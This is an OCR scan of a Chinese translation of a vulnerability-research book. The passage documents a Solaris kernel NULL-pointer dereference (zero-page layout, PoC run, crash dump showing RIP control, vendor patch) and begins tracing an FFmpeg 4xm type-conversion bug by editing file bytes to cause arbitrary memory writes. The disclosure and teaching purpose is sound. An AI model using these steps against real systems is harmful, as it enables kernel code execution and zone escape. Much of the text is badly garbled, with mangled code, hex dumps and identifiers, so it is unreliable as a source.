fa Es ERA Op EE AEH (E 32 行 至 第 63 行 )。 图 3-6 展示 了 这 
个 布局 的 相关 部 分 。 


OXOO 
















«— qi-»4i putp (start of qi struct) 


"NT ; (2) 
OXOOOOOOOOOOOOOOOO ill-»ill ptr (start of ill struct) 
CM TEE — LT] e 
2 
«— qp -»fivst 


OXOOOCOOCOOCOOCOOCOCOOCO 
OxOOCOOCOCOCOOOOOOCOO 


Am mmm mm ND 


图 3-6 和 零 页 内 存 的 数据 布局 


图 3-6 中 左 侧 显示 的 是 零 页 内 存 中 的 俩 移 。 中 间 列 出 零 页 内 存 中 的 实际 数据 
值 。 右 侧 显 示 了 内 核对 零 页 内 存 的 引用 。 表 3-1 描述 了 图 3-6 中 的 数据 布局 。 


#3-1 零 页 内 存 数据 布局 描述 


OXO8 








0x10 
(4) 
Ox18 





OX20 


OX28 










Ox30 
(3) 


Ox38 «— 9p->last 














函数 /代码 行 内 核 引 用 的 数据 jt 述 
ip sioctl tunparam() ill = ipif-» ipif 的 值 是 NULL， 成 员 ipif_ill 在 ipif 内 的 偏 移 是 0x8。 
9432 ipif ill; 因此 ipif->ipif _ i115| 用 了 地 址 0x8。 地 址 0x8 处 的 值 分 


配给 i11。 所 以 il1 结 构 体 从 地 址 0x10 开 始 ( 见 图 3-6 中 的 
(1)) 
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(5) 
函数 /代码 行 内 核 引 用 的 数据 fi R 
ip sioctl tunparam() putnext(ill-» ill-»ill wq 的 值 用 作 putnext() 的 一 个 参数 。 
9446 ill wq, mp1); il]_wq 在 ill 结 构 体 中 的 偏 移 是 0x10。ill 结 构 体 


从 地 址 90x10 处 开始 ， 所 以 ill->ill_wq 在 地 址 
0x20 处 被 ?| 用 





putnext() putnext(queue t qp 的 地 址 等 于 il1->ill wq 指 向 的 值 。 因 此 ，qp 
147 *gp, mblk t *mp) 从 地 址 0x28 处 开始 ( 见 图 3-6 中 的 (2)) 

putnext() qp - qp-»q next; q_next 在 qp 结 构 体 内 的 偏 移 是 0x18。 因 此 ， 下 一 
176 个 qp 将 用 地 址 0x40 处 的 值 赋值 : qp(ox28) 的 开始 


地 址 +q_next(0x18) 偏 移 。 地 址 0x40 处 的 值 又 是 
0x28， 所 以 下 一 个 qp 结 构 体 从 之 前 一 个 结构 体 相 
同 的 地 址 处 开始 ( 见 图 3-6 中 的 (3)) 











putnext() Sq = qp-»q syncg; q syncq fE qp £& 44 As N IJ fia £9 A 0x78 。 因 为 

15 q_syncq 之 后 被 引用 ， 它 必须 指向 一 个 有 效 的 内 
存 地 址 。 我 选择 ox7do， 一 个 映射 了 的 零 页 内 存 
中 的 地 址 

putnext() qi = qp-»q qinfo; qp->q_qinfofly EWA qi, q ginfofEqp£t ffs Hi 

180 的 偏 移 是 0x0。 因 为 qp 结 构 体 从 地 址 0x28 开 始 ， 
所 以 这 个 值 0x0 赋 值 给 了 qi ( 见 图 3-6 中 的 (4)) 

putnext() putproc = qi-> qi->qi_putp 的 值 赋 给 函数 指针 putproc。qi_putp 

273 gi putp; 在 qi 结构 体 中 的 偏 移 是 0x0。 因 此 ，qi->qi_putp 





TE Hb hb oxo &b ak SIA, dE Hh HE &b AY fü 
(0x0000000041414141) 赋 给 这 个 函数 指针 





然后 编译 这 段 POC 代 码 , 并 以 非特 权 用 户 喘 份 在 一 个 受 限 的 、 非 全 局 的 Solaris 
区 域 中 测试 它 。 


solaris$ isainfo -b 
64 


solaris$ id 
uid=100(wwwuser) gid=1(other) 


solaris$ zonename 
wwwzone 


solaris$ ppriv -S $$ 
1422: -bash 
flags = <none> 

E: basic 

I: basic 

P: basic 

L: zone 
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solaris$ /usr/sfw/bin/gcc -m64 -0 poc2 poc2.c 


solaris$ ./poc2 
[+] Opening '/dev/arp' device .. OK 
[+] Trying to map zero page .. OK 
[4] PAGESIZE: 4096 
[+] Zero page data: 
... 0x00: 0x0000000041414141 
... 0x08: 0x0000000000000010 
. 0x10: 0x0000000000000000 
... 0x18: 0x0000000000000000 
... OX20: 0x0000000000000028 
... 0x28: 0x0000000000000000 
e ee 0X30: 0x0000000000000000 
. 0x38: 0x0000000000000000 
... 0x40: 0x0000000000000028 
... Oxa0: 0x00000000000007d0 
[+] The bug will be triggered in 2 seconds.. 





ASLVLADAIOPSUS. Waa, REA AR OCP CLA Pas m HJ 
详细 描述 见 B.1715 )。 


solaris# id 
uid=0(root) gid=0(root) 


solaris# hostname 
bob 


solaris# cd /var/crash/bob/ 


solaris# ls 
bounds unix.O vmcore.O unix.1 vmcore.1 


solaris# mdb unix.1 vmcore.1 

Loading modules: [ unix krtld genunix specfs dtrace cpu.generic uppc pcplusmp ufs ip 
hook neti sctp arp usba fcp fctl nca lofs mpt zfs audiosup md cpc random crypto fcip 
logindmux ptm sppp nfs ] 


> ::msgbuf 

[- +] 

panic[cpuo]/thread-ffffffff8816c120: 

BAD TRAP: type-e (#pf Page fault) rp-fffffe800029f530 addr-41414141 occurred in 
module "«unknown»" due to an illegal access to a user address 


poc2: 

#pf Page fault 

Bad kernel fault at addr=0x41414141 

pid-1404, pc=0x41414141, sp-Oxfffffe800029f628, eflags=0x10246 

cro: 80050033«pg,wp,ne,et,mp,pe» cr4: 6bo«xmme,fxsr,pge,pae,pse» 

cr2: 41414141 cr3: 17823000 cr8: C 
rdi: 28 rsi: ffffffff81700380 rdx: ffffffff8816c120 
rcx; O r8: O r9: 0 
rax: O rbx: O rbp: fffffe800029f680 
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r10: 1 r11: 0 r12: 7d0 

r13: 28 r14: ffffffff81700380 r15: 0 

fsb: fffffd7fff220200 gsb: fffffffffbc27fcO ds: 0 
es: 0 fs: 1bb gs: 0 

trp: G err: 10 rip: 41414141 
CS: 28 rfl: 10246 rsp: fffffe800029f628 
S53 30 


fffffe800029f440 unix:die+da () 
fffffe800029f520 unix:trap+5e6 () 
fffffe800029f530 unix: cmntrap+140 () 
fffffe800029f680 41414141 () 
fffffe800029f6d0 ip:ip sioctl tunparam+ee () 
fffffe800029f780 ip:ip process ioctl4280 () 
fffffe800029f820 ip:ip wput nondata4970 () 
fffffe800029f910 ip:ip output options+537 () 
fffffe800029f920 ip:ip output+10 () 
fffffe800029f940 ip:ip wput+37 () 
fffffe800029f9a0 unix:putnext+1f1 () 
fffffe800029f9d0 arp:ar wput+9d () 
fffffe800029fa30 unix:putnext+1f1 () 
fffffe800029fab0 genunix:strdoioctle67b () 
fffffe800029fdd0 genunix:strioctl«620 () 
fffffe800029fdfO0 specfs:spec ioctl467 () 
fffffe800029fe20 genunix:fop ioctl425 () 
fffffe800029ff00 genunix:ioctl+ac () 
fffffe800029ff10 unix:brand sys syscall+21d () 


syncing file systems... 
done 
dumping to /dev/dsk/cOdOs1, offset 107413504, content: kernel 


» $c 

0x41414141() 

ip sioctl tunparameOxee() 
ip process ioctl«0x280() 
ip wput nondata*0x970() 
ip output options40x537() 


ip output+0x10() 
ip wput+0x37() 
putnext+0x1f1() 
ar_wput+0x9d() 


putnext+0x1f1() 
strdoioct1+0x67b() 
strioctl4«0x620() 
spec ioctl«0x67() 
fop ioctl40x25() 
ioctl+0xac() 

sys syscall+0x17b() 
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这 次 系统 因为 内 核 试图 执行 地 址 0x41414141 CRIP 寄存 带 的 值 ， 如 上 述 代码 
中 调试 器 输出 信息 中 粗 体 所 示 ) 处 的 代码 而 月 演 。 这 意味 着 我 已 经 完全 控制 了 
EIP/RIP, 

有 了 合适 的 漏洞 利用 编码 ( exploit payload ^ )， 就 可 以 利用 这 个 bug 来 突破 一 
个 受 限 的 、 非 全 局 的 Solaris 区 域 ， 然 后 在 全 局 区 域 中 获得 超级 用 户 权 限 。 

由 于 我 的 国家 有 严格 的 法 律 限制 ， 我 不 能 给 你 一 个 完整 的 、 可 工作 的 漏洞 利 
用 程序 。 如 果 你 有 兴趣 , 可 以 到 本 书 的 网 站 去 看 我 录制 的 一 个 实际 演示 的 视频 。 

















3.3 漏洞 修正 


2008 年 6 月 /2 日 ， 星 期 四 


在 我 将 这 个 bug 通知 Sun 之 后 ， 他 们 开发 了 以 下 补丁 来 处 理 这 个 漏洞 。… 
[..] 
19165 if (*cp == IPIF SEPARATOR CHAR) { 
19166 £7 
19167 * Reject any non-decimal aliases for logical 
19168 * interfaces. Aliases with leading zeroes 
19169 * are also rejected as they introduce ambiguity 
19170 * in the naming of the interfaces. 
19171 * In order to confirm with existing semantics, 
19172 * and to not break any programs/script relying 
19173 * on that behaviour, if«0»:0 is considered to be 
19174 * a valid interface. 
19175 j 
19176 * If alias has two or more digits and the first 
19177 * is zero, fail. 
19178 */ 
19179 if (&cp[2] < endp 8& cp[1] == '0') { 
19180 if (error != NULL) 
19181 *error = EINVAL; 
19182 return (NULL); 

j 


为 了 修复 这 个 bug, Sun FERAL ipif lookup on _name() 的 第 19180 行 和 第 19181 
行 引 入 了 新 的 错误 状态 。 这 成 功 阻 止 了 空 指 针 解 引用 的 发 生 。 虽 然 这 种 方法 修复 
了 本 章 摘 述 的 漏洞 , 但 是 它 并 没有 从 根本 上 人 解决 问题 。 洱 数 ipif lookup on name() 
以 及 其 他 内 核 函 数 ， 仍 然 用 两 个 不 同方 法 回调 用 函数 报告 错误 状态 ， 因 此 如 有 果 使 








(D 在 计算 机 安全 领域 ， 术 语 payload 指 实行 攻击 行为 的 恶意 代码 的 一 部 分 。 一 一 译 者 注 
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用 API 不 是 非常 小 心 的 话 ， 极 有 可 能 再 次 发 生 类 似 的 bug. Sun 应 该 修改 API 2E 
预防 这 些 bug， 但 他 们 没有 这 样 做 。 


3.4 经 验 和 教训 


作为 一 名 程序 员 : 

O 务必 定义 正确 的 错误 状态 ; 

口 务必 准确 验证 返回 值 ; 

a 并 韭 所 有 内 核 空 指 针 解 引用 都 只 是 拒绝 服务 那么 人 简单。 其 中 一 些 是 非常 严 
重 的 漏洞 ， 可 以 导致 任意 代码 执行 。 

作为 一 名 系统 管理 员 : 

口 不 要 育 目 相信 区 域 、 隅 开 的 空间 、 细 粒度 的 访问 控制 以 及 虚拟 化 。 如 果 内 
BA bug， 则 每 一 项 安全 特性 都 极 有 可 能 被 纸 过 或 规避 反 ， 而 且 不 仅仅 
Solaris 区 域 是 这 样 。 














3.5 ”补充 
2008 年 12 月 /17 日， 星期 三 
因为 这 个 漏洞 已 被 修复 ， 相 关 的 Solaris 补丁 也 有 了 ， 今 天 我 在 自己 的 网 站 上 


发 布 了 详细 的 安全 报告 …。 这 个 bug 的 编号 是 CVE-2008-568. Sun 用 了 471 KA 
给 出 了 操作 系统 的 修复 版 本 (OLE 3-7), AAT! 





Sun Gay ik sf al 
Sun fo bug T3. Œ | 、 
SATIS T — acabcolvisdidhih p “我 公开 安全 报告 


Vl Y N^ 


09.04.2007 O4.05.2007  O6.12.2008 12.17.2008 





图 3-7 从 告知 这 个 bug 到 发 布 修复 版 本 操作 系统 的 时 间 表 


附注 

[1] OpenSolaris 的 源 代 码 可 从 以 下 网 址 下 载 : http://dlc.sun.com/osol/on/downloads/( 短 址 为 
http://bit.ly/K3hNjH ). 

[2] JL http://en.wikipedia.org/wiki/Ioctl ( HEX http://bit.ly/ACraTY )。 


[9] 


[10] 


[11] 
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更 多 IP-in-IP 隧道 机 制 的 信息 ,参考 http://download.oracle.com/docs/cd/E19455-01/806-0636/ 
6j9vq2bum/index.html ( 短 址 为 http://bit.ly/wOoRVC )。 

UL Sun 公司 的 《STREAMS hht FA X (STREAMS Programming Guide )， 可 从 以 下 网 址 下 载 : 
http://download.oracle.com/docs/cd/E19504-01/802-5893/802-5893.pdf ( 短 址 为 http://bit.ly/ z0XAVb ); 
使 用 源 代码 浏览 工具 OpenGrok 查阅 OpenSolaris 源 代 码 : http://cvs.opensolaris.org/source/ 
xref/onnv/onnv-gate/usr/src/uts/common/sys/stream.h?r-4823963A 7c9aaea16585( 短 址 为 http:// 
bit.ly/zJGP7D )。 

使 用 源 代码 浏览 工具 OpenGrok 查阅 OpenSolaris 源 代 码 : http://cvs.opensolaris.org/source/ 
xref/onnv/onnv-gate/usr/src/uts/common/sys/stream.h?r=4823%3A7c9aaea16585( 短 址 为 http:// 
bit.ly/zJGP7D )。 

使 用 源 代码 浏览 工具 OpenGrok 查阅 OpenSolaris 源 代码 : http://cvs.opensolaris.org/source/ 
xref/onnv/onnv-gate/usr/src/uts/common/inet/ip/ip_if.c?r=5240%3Ae7599510dd03 ( Ay hk X 
http://bit.ly/wTxGWn )。 

官方 的 《Solaris Modular Debugger 指责》 可 从 以 下 网 址 得 到 : http://docs.oracle.com/cd/ 
E19253-01/816-5041/ ( 短 址 为 http://bit.ly/LmIZLI )。 

更 多 的 信息 , BF twiz 和 sgrakkyu HJi& Xx. “Attacking the Core: Kernel Exploiting Notes”, 可 从 以 
下 网 址 得 到 : http:/wwwphrack.conyissues.html?issue=64&id=6 ( 短 址 为 http://bit.ly/ y58rNC )。 
关于 Solaris 进程 虚拟 地 址 空间 的 更 多 信息 见 http://cvs.opensolaris.org/source/xref/onnv/ 
onnv-gate/usr/src/uts/i86pc/os/startup.c?r=10942:eaa343de0d06 ( 短 址 为 http://bit.ly/xrvJbm )。 
使 用 源 代码 浏览 工具 OpenGrok 查阅 OpenSolaris 源 代 码 : http://cvs.opensolaris.org/source/ 
xref/onnv/onnv-gate/usr/src/uts/common/os/putnext.c?r-0963A68195e015346 ( 短 址 为 http://bit.ly/ 
xZjyNm ). 


[12] JL http://www.trapkit.de/books/bhd/ ( HEX http://bit.ly/yZX6td )。 


[1 


[14] 


3] Sun 提供 的 补丁 可 从 以 下 网 址 得 到 : http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/ 


src/uts/common/inet/ip/ip_if.c?r1=/onnv/onnv-gate/usr/src/uts/common/inet/ip/ip_if.c@5240&r2 
=/onnv/onnv-gate/usr/src/uts/common/inet/ip/ip_if.c@5335&format=s&full=0 ( 短 址 为 http://bit. 
ly/xg8TeR ). 

我 详细 描述 这 个 Solaris PT] ERa RIVA P AAEE: http://www.trapkit. 
de/advisories/TKADV2008-015.txt ( 短 址 为 http://bit.ly/ymNVc8 )。 





空 指针 万 岁 


2009 年 1 月 24 EJ, PHA 


今天 我 发 现 了 一 个 非常 “完美 ”的 bug: 一 个 导致 空 指针 解 引 用 的 类 型 转换 
iil] ( 见 A2 T) 通 帝 情况 下 这 不 是 个 大 问题 ， 因 为 这 个 bug 影响 了 一 个 用 户 空 











间 库 ， 这 往往 意味 着 在 最 坏 情 况 下 ， 它 会 使 一 个 用 户 空间 应 用 程序 骨 演 。 但 是 这 
个 bug 和 一 般 用 户 空 间 的 空 指针 解 引用 不 同 ， 它 可 能 被 利 用 来 执行 任意 代码 。 


这 个 漏洞 影响 FFmpeg 的 多 媒体 库 。 很 多 流行 
的 软件 项 目 使 用 这 个 库 ， 包 括 Google Chrome, 
VLC 媒体 播放 器 、MPlayer 和 Xine 等 。 也 有 传言 
说 YouTube 用 FFmpeg 作为 后 台 转 换 软 件 。 癌 


4.1. AX jo 


我 发 现 这 个 漏洞 的 步 又 如 下 。 

口 第 一 步 : 列 出 FFmpeg 的 解 复 用 硕 。 
a 第 二 步 : 识别 输入 数据 。 

D 第 三 步 : 跟踪 输入 数据 。 





还 有 其 他 可 利用 的 用 户 
空间 空 指针 解 引用 的 例子 ， 
W Mark Dowd & MacGyver 
exploit for Flash ( http://blogs. 
iss.net/archive/Tlash.html, 94 
为 http://bit.ly/k3JmcM >, 3k 
者 Justin Schuh 的 Firefox bug 
( http://blogs.iss.net/archive/ 
cve-2008-00l7.html ,  *U th FQ 


http://bit.ly/J6VsnJ> . 
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4.1 发 现 漏洞 


4.1.1 第 一 步 : 列 出 FFmpeg 的 解 复 用 器 


从 FFmpeg 的 SVN 仓库 取得 最 新 版 本 源 代 码 之 后 ,生成 它 包 含 的 libavformat 
库 中 可 用 的 解 复 用 融 列表 COLA 4-1 )。 我 注意 到 FFmpeg FEA DOR asap 
目录 libavformat/ 下 的 一 个 个 不 同 的 C 文件。 


1 Em BAD mpeg) libavrormat = 
File Edit View Terminal Help 


tkgubuntu: -/BHD/ffmpeg/libavformatS ls 

4xm.c flic.c mpjpeg.c 

adtsenc.c flvdec.c msnwc tcp.c rtpdec.c 

aiff.c flvenc.c mtv.c rtpenc.c 

allformats.c flv.h mvi.c rtpenc h264.c 
framecrcenc.c mxf.c rtp.h 
framehook. c mxfdec.c rtp h264.c 
framehook.h mxfenc.c rtp h264.h 
gif.c mxf.h rtp internal.h 

asfcrypt.c gxf.c network.h rtp mpv.c 

asfcrypt.h gxfenc.c nsvdec.c rtp mpv.h 
gxf.h nut.c rtpproto.c 
http.c nutdec.c rtsp.c 
idcin.c nutenc.c rtspcodes.h 
idrog.c nut.h rtsp.h 
iff.c nuv.c sdp.c 








图 4-1 FFmpeg libavformat JPA fe e Has 



































注意 FFmpeg 的 开发 已 经 移 到 Git & EU, iX4- SVN 仓库 不 再 更 新 。 现 在 这 个 
漏洞 版 本 的 源 代码 ( SVN-r16556 ) TAA MSE FR, P 














4.1.2 第 二 步 : 识别 输入 数据 


接 下 来 我 尝试 识别 解 复 用 器 处 理 的 输入 数据 。 读 源 代码 的 时 候 ， 我 发 现 大 部 
分 解 复 用 融 都 声明 了 一 个 叫做 demuxername read header()BWJPAZ&, ix^ PR BOR FF 
都 有 一 个 AVFormatContext 类 型 的 参数 。 上 因数 声 明 并 初始 化 了 一 个 指针 ， 就 像 下 
面 这 样 : 


[ 
ByteIOContext *pb = s-»pb; 
[ +] 


很 多 不 同 的 get something 函数 (Mlun, get le32()，get_buffer() ) 和 专用 
A (PRN, AV_RL32, AV_RL16) 用 于 提取 pb 指 回 的 部 分 数据 。 这 时 ， 我 非常 确 
XE. pb 就 是 指 癌 所 处 理 媒 体 文件 输入 数据 的 指针 。 


41.3 第 三 步 : 跟踪 输入 数据 

我 决定 在 源 代码 级 别 跟 踊 每 一 个 解 复 用 此 的 输入 数据 来 寻找 bug。 从 列表 中 
的 第 一 个 解 复 用 器 4xm.c 开始 。 当 开始 检查 AX 电影 文件 格式 外 的 解 复 用 器 时 ,我 
发 现 了 下 面 列 出 的 这 个 漏洞 。 
源 代码 文件 ”libavformat/4xm.c 








eKA fourxm read header() 


[..] 

93 static int fourxm read header(AVFormatContext *s, 

94 AVFormatParameters *ap) 
95 ( 

96  BytelOContext *pb = s->pb; 


101 unsigned char *header; 
103 int current track = -1; 


106 fourxm->track_count = 0; 
107  fourxm-»tracks = NULL; 


120 /* allocate space for the header and load the whole thing */ 
121 header - av malloc(header size); 
122 if (!header) 


123 return AVERROR(ENOMEM) ; 

124 if (get_buffer(pb, header, header_size) != header_size) 

125 return AVERROR(EIO); 

160 } else if (fourcc_tag == strk TAG) { 

161 /* check that there is enough data */ 

162 if (size != strk SIZE) { 

163 av free(header); 

164 return AVERROR INVALIDDATA; 

165 } 

166 current_track = AV_RL32(&header[i + 8]); 

167 if (current_track + 1 > fourxm->track_count) { 

168 fourxm-»track count = current track + 1; 

169 if((unsigned)fourxm-»track count »- UINT MAX / sizeof(AudioTrack)) 
170 return -1; 

171 fourxm-»tracks = av realloc(fourxm-»tracks, 

172 fourxm-»track count * sizeof(AudioTrack)); 

173 if (!fourxm->tracks) { 

174 av_free(header); 

175 return AVERROR(ENOMEM) ; 

176 } 

177 } 

178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); 
179 fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]); 
180 fourxm-»tracks[current track].sample rate = AV_RL32(&header[i + 40]); 


181 fourxm-»tracks[current track].bits = AV_RL32(&header[i + 44]); 
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512447, KZ get buffer() 从 所 处 理 的 媒体 文件 复制 输入 数据 到 header 1& 
fr] HEB IX. COLES 101 行 和 第 121 行 ) 如 果 媒 体 文件 包含 所 谓 的 strk ER ( 见 
第 160 行 )， 第 166 行 的 AV_RL32() 宏 从 数据 关中 读 取 一 个 无 符号 整 型 值 并 保存 到 
有 符号 整 型 变量 current track 中 ( 见 第 103 行 )。 这 个 来 自 媒 体 文件 、 由 用 户 控 
制 的 无 符号 整 型 数 转换 成 一 个 有 符号 整 型 数 时 会 导致 一 个 类 型 转换 bug! 我 来 了 
精神 ， 继 续 人 研究 代码 ， 想 到 可 能 有 重要 发 现 ， 不 党 兴奋 起 来 。 

第 167 行 的 if 语句 检查 了 用 户 控 制 伸 current track + 1 是 否 大 于 
fourxm-»track count。 有 符号 整 型 变量 fourxm-»track count 初始 化 为 0 〈 见 第 
106 ÍF )。 赋 给 current_track 一 个 大 于 等 于 ox80000000 的 值 会 让 它 的 符号 变化 ， 
使 得 current track 被 解释 成 一 个 负数 (从 A.3 节 中 可 以 找到 原因 )。 如 采 
current track 解释 为 负数 , 第 167 行 的 if 语句 将 会 总 是 返回 FALSE C 因为 有 符号 
整 型 变量 fourxm-»track count 的 值 是 0), 2 171 行 的 绥 冲 区 分 配 就 永远 不 会 执 
行 。 显然 , 把 那个 无 符号 整数 的 用 户 控 制 值 转换 为 一 个 有 符号 整数 不 是 个 好 主意 。 

因为 fourxm-»tracks 初始 化 为 NULL( 见 第 107 £1), P 171 行 不 会 执行 ， 第 
178 行 至 第 181 行 的 写 操 作 导 致 了 4 个 空 指针 解 引 用 。 因 为 空 指针 基于 用 户 控制 
值 current_track 解 引 用 ， 用 户 控制 数据 可 能 被 写 到 范围 很 大 的 一 段 内 存 中 的 任 
何 位 置 。 


























注意 ”也许 你 觉得 严格 意义 上 这 不 能 叫做 空 指 针 “ 解 引用 ”， 因 为 我 并 没有 真正 
解 引 用 一 个 空 指针 ， 而 是 解 引 用 一 个 不 存在 的 结构 体 ， 该 结构 体位 于 从 
NULL 开始 偏 移 量 为 用 户 控制 值 的 位 置 。 最 终 , 这 取决 于 你 如 何 定 义 空 指针 
解 引 用 这 一 术语 。 


图 4-2 显示 了 FFmpeg 的 期 望 行为 ， 如 下 所 示 。 

(1) fourxm-»tracks 初始 化 为 NULL ( 见 第 107 行 )。 

(2) 如 果 处 理 的 媒体 文件 包含 一 个 strk 块 ， 从 块 的 用 户 控 制 数据 里 取出 
current track 的 值 ( 见 第 166 行 )。 

(3) 如 果 current track + 1 的 值 大 于 0, 分配 一 个 堆 缓 冲 区 。 

(4) 分 配 fourxm->tracks 指 问 的 堆 缓冲 区 ( 见 第 171 行 和 第 172 行 )。 

(5) 媒体 文件 的 数据 复制 到 堆 缓 冲 区 ， 以 current track 作为 缓冲 区 数组 的 下 


bk CULTE 178 行 至 第 181 行 )。 
(6) 发 生 这 种 情况 时 ， 就 没有 安全 问题 。 


4X 电 影 文件 





( 


1) (2) (4) 
strk +T1 > O 
) - fourxm->tracks = 
o | 
fourxm->tracks[current_track].adpcm = 
AV_RL32(&header[i + 12]) 
| 





图 4-2 FFmpeg 正常 运行 时 的 期 望 行为 
图 4-3 显示 当 这 一 bug 对 FFmpeg 造成 影响 时 发 生 了 什么 ， 如 下 所 示 。 


4X 电影 文件 


11«0 





(1) 


fourxm->tracks = NULL fourxm->tracks = 
av. vealloc(..) 


(3) 





内 存 数 据 损坏 


图 4-3. FFmpeg 导致 内 存 数据 损坏 的 非 期 望 行为 


(1) fourxm-»tracks 初始 化 为 NULL ( 见 第 107 行 )。 

(2) 如 果 处 理 的 媒体 文件 包含 一 个 strk 块 ， 从 块 的 用 户 控制 数据 里 取出 
current track 的 值 ( 见 第 16617 )。 

(3) 如 果 current track + 1 的 值 小 于 0， 不 分 配 堆 缓冲 区 。 
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(4) fourxm-»tracks 仍 指 向 NULL 内 存 地 址 。 

(5) 结果 空 指针 基于 用 户 控制 值 current track 解 引 用 时 ，4 个 32 位 用 户 控制 
值 赋 给 了 解 引 用 的 位 置 ( 见 第 178 行 至 第 181 行 )。 

(6) 4 个 用 户 控 制 的 内 存 位 置 分 别 被 4 个 用 户 控 制 的 数据 学 市 覆 写 。 

多 么 “完美 ”的 一 个 bug! 





4.2 iT FA 


iiie 这 个 漏洞 ， 我 执行 了 以 下 步骤 。 这 个 漏洞 影响 3 所 有 
一 步 : 找 一 个 带 有 有 效 strk 块 的 4X 样 FFmpeg 支持 的 控 作 系统 平台 ， 
et 乡 文件 。 这 一 意 我 使 用 的 平台 是 32 位 
"Boop: 了 解 这 个 strk 块 的 布局 。 Ubuntu Linux 9.04( Peak R X D. 


23-5 修改 这 个 strk GA FFmpeg Hiis o 
第 四 步 : 修改 这 个 strk 块 以 控制 EIP。 
z 几 种 利用 这 个 文件 格式 bug 的 方法 。 可 以 重新 做 一 个 格式 正确 的 文件 ， 或 
者 修改 一 个 已 经 存在 的 文件 。 我 选择 后 一 种 方法 。 在 网 站 http://samples.mplayerhq. 
hu/ 上 搜索 一 个 适合 测试 这 一 漏洞 的 4X 电影 文件 。 可 以 自己 做 一 个 文件 ， 但 是 下 
RHODE ORE 


4.2.1 找 一 个 带 有 有 效 strk 块 的 AX 样 例 电影 文件 
用 以 下 命令 从 http:/samples.mplayerhq.hu/ 得 到 一 个 样 例 文件 。 


linux$ wget -q http://samples.mplayerhq.hu/game-formats/4xm/ > 
TimeGatep01s01n01a02_2.4xm 


文件 下 载 之 后 ， 我 把 它 重 命名 为 original.4xm。 


4.2.2 ”第 二 步 : 了 解 这 个 strk 块 的 布局 
按照 4X 电影 文件 格式 的 描述 ， 一 个 strk 块 有 以 下 结构 : 


bytes 0-3 fourcc: "strk 

bytes 4-7 length of strk structure (40 or 0x28 bytes) 
bytes 8-11 track number 

bytes 12-15 audio type: O - PCM, 1 - 4X IMA ADPCM 

bytes 16-35 unknown 

bytes 36-39 number of audio channels 


bytes 40-43 audio sample rate 
bytes 44-47 audio sample resolution (8 or 16 bits) 


下 载 的 样 例文 件 的 strk SCA OCH ERAS 0x1a6 处 开始 ， 如 图 4-4 所 示 。 


&header[!] 


l (1) (2) (3) 


000001a0h: 32 2E 77 61 76 00|73 74 72 68| 73 74 72 68]28 oo oo oo[po oo]; 2.wav. SER 
000001b0h: [oo oo|po oo oo oo oo 00 00 00]00 00 04 00 D1 07 00 00 2F O0 ; ..........N... i 





图 4-4 下 载 的 4X 样 例 电 影 文 件 的 strk 块 。 图 中 的 数字 在 表 4-1 HER 
dé 4-1 描述 了 图 4-4 显示 的 strk 块 布局 。 


表 4-1 图 4-4 显 示 的 strk 块 布局 构成 


引用 编号 数据 头 偏 移 描 xh 
(1) &header[i] 四 字符 代码 strk 
Q) &header[i+4] strk 结 构 的 大 小 (0x281) 
(3) &header[i+8 ] track number (这 是 FFmpeg 源 代码 里 的 current_track 变 量 ) 
(4) &header[i+12] audio type (这 就 是 写 入 第 一 处 内 存 解 引 用 的 值 ) 


为 了 利用 这 个 漏洞 ， 我 知道 需要 设置 &header[i+8] 处 的 track number 值 (对 
应 FFmpeg 源 代码 里 的 current track 变量 ) 和 8&header[i+12] 人 处 的 audio type 值 。 
如 果 正 确 设 置 了 数值 ，audio type 的 值 会 写 到 NULL + track number 的 内 存 位 置 ， 
也 就 是 NULL + current track 的 值 。 

总 的 来 说 ，FFmpeg 源 代码 里 ( 近乎 ) 随意 的 内 存 写 操作 如 下 。 


178 fourxm-»tracks[current track].adpcm = AV RL32(&header[i + 12]); 

179 fourxm-»tracks[current track].channels = AV RL32(8header[i + 36]); 
180 fourxm-»tracks[current track|.sample rate = AV res + 40]); 
181 fourxm->tracks[ current track].bits = AV RL32(&header[i + 44]); 


一 行 对 应 下 面 这 样 的 伪 代 码 。 


NULL[user controlled value].offset = user controlled data; 
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4.2.3 Bap: 修改 这 个 strk 块 以 使 a i= FFmpeg : 


FFmpeg ARGS linux$ Vul eg make 
这 些 命令 将 会 编 详 两 个 不 同 


编译 了 FFmpeg 市 有 漏洞 的 16556 版 本 源 的 FFmpeg 二 进 制 版 本 : 





代码 之 后 ， 我 尝试 着 把 这 个 AX 电影 文件 转换 O Ftmpeg, Ww 

为 AVI 文件 ， 以 确认 编译 成 功 、FFmpeg 可 以 完 的 二 进 制程 序 

美 地 工作 O Fimpeg-9， 时 有 调试 加 
Bab — it ty 4 È 


linux$ ./ffmpeg g -i original.4xm original.avi 
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. 
configuration: 
libavutil 49.12. 0 / 49.1 
libavcodec 52:105 07 52:10: 0 
libavformat 52.23. 1 / 52.2 
libavdevice 52. 1. 0 / 52 
built on Jan 24 2009 02:30:50, gcc: 4.3.3 
Input #0, 4xm, from 'original.A4xm': 
Duration: 00:00:13.20, start: 0.000000, bitrate: 704 kb/s 
Stream #0.0: Video: 4xm, rgb565, 640x480, 15.00 tb(r) 
Stream 40.1: Audio: pcm s16le, 22050 Hz, stereo, s16, 705 kb/s 
Output #0, avi, to 'original.avi': 
Stream 40.0: Video: mpeg4, yuv420p, 640x480, q-2-31, 200 kb/s, 15.00 tb(c) 
Stream 40.1: Audio: mp2, 22050 Hz, stereo, s16, 64 kb/s 
Stream mapping: 
Stream $0.0 -> 80.0 
Stream #0.1 -» #0.1 
Press [q] to stop encoding 
frame- 47 fps- 0 q-2.3 Lsize- 194kB time-3.08 bitrate- 515.3kbits/s 
video:158kB audio:24kB global headers:OkB muxing overhead 6.715897% 


接 下 来 ， 我 修改 了 样 例文 件 的 strk 块 中 track number 和 audio type 的 
数值 。 
如 图 4-5 所 示 ， 我 把 track number 的 值 改 为 0xaaaaaaaa (1), audio type 的 
值 改 为 0xbbbbbbbb (2)。 新 文件 命名 为 poc1.4xm， 然 后 尝试 用 FFmpeg 来 转换 它 
(以 下 调试 命令 的 描述 见 B.4 市 )。 
&header[i] 


(1) 
000001a0h: 32 2E 77 61 76 00 73 74 72 6B 28 00 00 OOJAA AA]; 2.wav.strk(... 22 


000001b0h: [AA AA|BB BB BB BB|OO 00 04 00 D1 07 00 00 2F 00 ; 323»»»»....N.../. 
(2) 














